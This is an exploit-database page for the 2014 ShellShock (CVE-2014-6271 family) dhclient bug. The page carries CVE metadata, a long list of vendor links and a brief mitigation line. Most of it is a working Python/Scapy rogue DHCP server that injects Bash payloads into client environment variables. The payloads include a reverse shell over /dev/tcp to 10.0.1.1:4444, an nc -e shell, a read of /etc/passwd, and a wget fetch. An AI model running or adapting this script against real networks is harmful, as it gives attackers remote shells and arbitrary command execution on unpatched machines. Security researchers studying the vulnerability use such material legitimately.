header-logo
Suggest Exploit
vendor:
Bash
by:
@fdiskyou
9,8
CVSS
HIGH
Command Injection
78
CWE
Product Name: Bash
Affected Version From: 4.1
Affected Version To: 4.1
Patch Exists: YES
Related CWE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
CPE: a:gnu:bash:4.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-6277/https://www.rapid7.com/db/?q=CVE-2014-6277&type=&page=2https://www.rapid7.com/db/?q=CVE-2014-6277&type=&page=2https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3092/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-512d1301-49b9-11e4-ae2c-c80aa9043978/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3093/https://www.rapid7.com/db/vulnerabilities/linuxrpm-ELSA-2014-3094/https://www.rapid7.com/db/vulnerabilities/ubuntu-USN-2380-1/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-6278/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-6277/https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-6277/https://www.rapid7.com/db/?q=CVE-2014-7169&type=&page=2https://www.rapid7.com/db/?q=CVE-2014-7169&type=&page=3https://www.rapid7.com/db/?q=CVE-2014-7169&type=&page=2https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/apple-osx-afpserver-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-7186/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-81e2b308-4a6c-11e4-b711-6805ca0b3d42/https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1354/https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/gnu-bash-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/hpsim-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/apple-osx-afpserver-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/apple-osx-bash-cve-2014-7187/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2014-7187/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian, Ubuntu, Kali
2014

ShellShock dhclient Bash Environment Variable Command Injection PoC

ShellShock dhclient Bash Environment Variable Command Injection PoC is a proof-of-concept exploit for the ShellShock vulnerability. It uses a malicious DHCP server to inject a malicious command into the environment variables of a vulnerable dhclient. This exploit can be used to execute arbitrary code on the target system.

Mitigation:

The best way to mitigate the ShellShock vulnerability is to patch the vulnerable system with the latest security updates. Additionally, users should ensure that their systems are running the latest version of the Bash shell.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29 
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *

conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload =   "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
 
def toMAC(strMac):
    cmList = strMac.split(":")
    hCMList = []
    for iter1 in cmList:
        hCMList.append(int(iter1, 16))
    hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
    return hMAC
 
def detect_dhcp(pkt):
#       print 'Process ', ls(pkt)
        if DHCP in pkt:
                # if DHCP Discover then DHCP Offer
                if pkt[DHCP].options[0][1]==1:
                        clientMAC = pkt[Ether].src
                        print "DHCP Discover packet detected from " + clientMAC
 
                        sendp(
                                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                                IP(src=server_ip,dst="255.255.255.255")/
                                UDP(sport=67,dport=68)/
                                BOOTP(
                                        op=2,
                                        yiaddr=victim_assign_ip,
                                        siaddr=server_ip,
                                        giaddr=gateway_ip,
                                        chaddr=toMAC(clientMAC),
                                        xid=pkt[BOOTP].xid,
                                        sname=server_ip
                                )/
                                DHCP(options=[('message-type','offer')])/
                                DHCP(options=[('subnet_mask',subnet_mask)])/
                                DHCP(options=[('name_server',dns_ip)])/
                                DHCP(options=[('lease_time',43200)])/
                                DHCP(options=[('router',gateway_ip)])/
                                DHCP(options=[('dump_path',rce)])/
                                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
                        )
                        print "DHCP Offer packet sent"
 
                # if DHCP Request than DHCP ACK
                if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
                        clientMAC = pkt[Ether].src
                        print "DHCP Request packet detected from " + clientMAC
 
                        sendp(
                                Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
                                IP(src=server_ip,dst="255.255.255.255")/
                                UDP(sport=67,dport=68)/
                                BOOTP(
                                        op=2,
                                        yiaddr=victim_assign_ip,
                                        siaddr=server_ip,
                                        giaddr=gateway_ip,
                                        chaddr=toMAC(clientMAC),
                                        xid=pkt[BOOTP].xid
                                )/
                                DHCP(options=[('message-type','ack')])/
                                DHCP(options=[('subnet_mask',subnet_mask)])/
                                DHCP(options=[('lease_time',43200)])/
                                DHCP(options=[('router',gateway_ip)])/
                                DHCP(options=[('name_server',dns_ip)])/
                                DHCP(options=[('dump_path',rce)])/
                                DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
                        )
                        print "DHCP Ack packet sent"
 
def main():
        #sniff DHCP requests
        sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
 
if __name__ == '__main__':
        sys.exit(main())

Navigation

Suggest Exploit

Services By CQR